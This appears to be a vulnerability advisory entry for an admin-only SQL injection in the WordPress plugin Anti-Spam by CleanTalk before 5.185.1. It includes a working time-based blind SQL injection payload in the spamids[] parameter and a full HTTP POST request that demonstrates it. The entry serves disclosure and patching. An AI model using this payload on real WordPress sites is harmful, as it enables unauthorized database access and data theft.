Lucene search

K
wpexploitNguyen Duy Quoc KhanhWPEX-ID:1B5A018D-F2D4-4373-BE1E-5162CC5C928B
HistoryOct 03, 2022 - 12:00 a.m.

Anti-Spam by CleanTalk < 5.185.1 - Admin+ SQLi

2022-10-0300:00:00
Nguyen Duy Quoc Khanh
211
anti-spam
cleantalk
sql injection
admin+ privilege
vulnerability
exploit

0.001 Low

EPSS

Percentile

37.7%

The plugin does not validate ids before using them in a SQL statement, which could lead to SQL injection exploitable by high privilege users such as admin

When deleting a scan logs (/edit-comments.php?page=ct_check_spam_logs), intercept the request and change the spamids[] parameter to 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)

POST /wp-admin/edit-comments.php?page=ct_check_spam_logs HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://localhost
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=dd06127571&action=delete&spamids%5B%5D=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)&action2=delete

0.001 Low

EPSS

Percentile

37.7%

Related for WPEX-ID:1B5A018D-F2D4-4373-BE1E-5162CC5C928B